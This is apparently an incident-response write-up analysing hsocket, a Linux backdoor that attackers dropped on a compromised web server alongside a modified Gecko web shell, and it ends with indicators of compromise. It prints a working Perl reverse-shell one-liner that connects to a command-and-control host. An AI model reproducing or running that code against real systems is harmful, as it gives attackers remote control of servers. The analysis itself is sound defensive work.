[ << ALL_FEED ]

He's not your gsocket

More in Malware

  • This is Siemens...

    Recently, our colleagues from the Positive Industrial Expertise Center discovered a curious Windows sample on MalwareBazaar.…

  • Anti-antivirus

    Recently, we came across an APK with an intriguing and trust-inspiring name: «Антивирус ФСБ.apk». After installing…

  • .exe .docm .xlsm

    .exe .docm .xlsm Malicious files with these extensions are most often found in corporate network traffic.…

  • Operation Chewbacca

    At the end of June, the PT ESC team, during incident investigations, discovered a new group…

  • Your Zimbra server is at risk

    Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…

He’s not gsocket to you 😑

During the investigation of one of the incidents, PT ESC IR specialists came across a rather curious tool called hsocket (not to be confused with gsocket).

After gaining initial access and installing a web shell, the attackers delivered three bash scripts to the compromised web server.

1️⃣ hsocket — a backdoor with the following functionality:

• launching an interactive command shell

• launching exploits for privilege escalation in Linux systems (PwnKit, Dirty Pipe, Dirty COW, Netfilter)

• scanning a directory for web shells and deleting them (likely to cover tracks)

• protecting files from deletion

• establishing a reverse shell connection to a command-and-control server using Perl code:

perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"

• downloading and running scripts to search for misconfigurations in Linux and escalate privileges (linenum, linpeas)

2️⃣ hfsm — a file manager that allows interactive work with the file system: viewing, editing, and deleting files.

3️⃣ .hsrc — sets full read, write, and execute permissions on the hsocket and hfsm files, and also creates aliases for launching these scripts.

As part of this research, we managed to find an article written in Indonesian that described this malware.

Interestingly, the web shell installed on the compromised server also contained comments and strings in Indonesian:

// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";

The web shell itself is a modified version of Gecko. This is indicated by the comments and characteristic lines of code:

//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->

IoC:

hsocket.io
/tmp/hs-data/

#ir #dfir #detect #ioc #malware
@ptescalator

More from oUth0R

More from oUth0R

More in Malware

  • This is Siemens...

    Recently, our colleagues from the Positive Industrial Expertise Center discovered a curious Windows sample on MalwareBazaar.…

  • Anti-antivirus

    Recently, we came across an APK with an intriguing and trust-inspiring name: «Антивирус ФСБ.apk». After installing…

  • .exe .docm .xlsm

    .exe .docm .xlsm Malicious files with these extensions are most often found in corporate network traffic.…

  • Operation Chewbacca

    At the end of June, the PT ESC team, during incident investigations, discovered a new group…

  • Your Zimbra server is at risk

    Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…